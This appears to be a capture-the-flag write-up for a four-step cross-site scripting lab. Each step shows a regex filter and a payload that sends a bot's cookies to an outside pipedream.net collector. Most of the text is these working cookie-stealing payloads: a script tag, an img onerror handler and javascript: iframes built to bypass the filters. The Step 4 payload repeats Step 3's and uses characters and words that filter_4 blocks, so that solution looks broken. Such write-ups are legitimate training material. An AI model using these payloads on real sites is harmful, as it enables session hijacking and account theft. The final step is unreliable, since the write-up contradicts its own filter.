This challenge is divided into four steps.
Step 1:
XSS ME 1/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
For the first step, the payload is not filtered.
Payload:
<script>fetch("https://eosbpqxq8zqclnd.m.pipedream.net?c="+document.cookie)</script>
New link for Step 2:
https://nopsctf-xss-lab.chals.io/0d566d04bbc014c2d1d0902ad50a4122
Step 2:
XSS ME 2/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
def filter_2(payload):
regex = ".*(script|(</.*>)).*"
if re.match(regex, payload):
return "Nope"
return payload
Payload:
<img src="/sfmqsjfmlkqdsfjmldsqkfjmsldkfj.png"
onerror="var i=new Image();i.src='https://eosbpqxq8zqclnd.m.pipedream.net?c='+encodeURIComponent(document.cookie);">
New link for Step 3:
https://nopsctf-xss-lab.chals.io/5d1aaeadf1b52b4f2ab7042f3319a267
Step 3:
XSS ME 3/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
def filter_3(payload):
regex = ".*(://|script|(</.*>)|(on\w+\s*=)).*"
if re.match(regex, payload):
return "Nope"
return payload
Payload:
<iframe src=jaVascript:top.location='//eosbpqxq8zqclnd.m.pipedream.net/?c='+document.cookie>
New link for Step 4:
https://nopsctf-xss-lab.chals.io/b355082fc794c4d1d2b6c02e04163090
Step 4:
XSS ME 4/4
Write a payload to be sent to the bot! Your goal is to steal his cookies.
You have to bypass this filter:
def filter_4(payload):
regex = "(?i:(.*(/|script|(</.*>)|document|cookie|eval|string|(\"|'|`).*(('.+')|(\".+\")|(`.+`)).*(\"|'|`)).*))|(on\w+\s*=)|\+|!"
if re.match(regex, payload):
return "Nope"
return payload
Payload:
<iframe src=jaVascript:top.location='//eosbpqxq8zqclnd.m.pipedream.net/?c='+document.cookie>
And you get the flag in the cookie.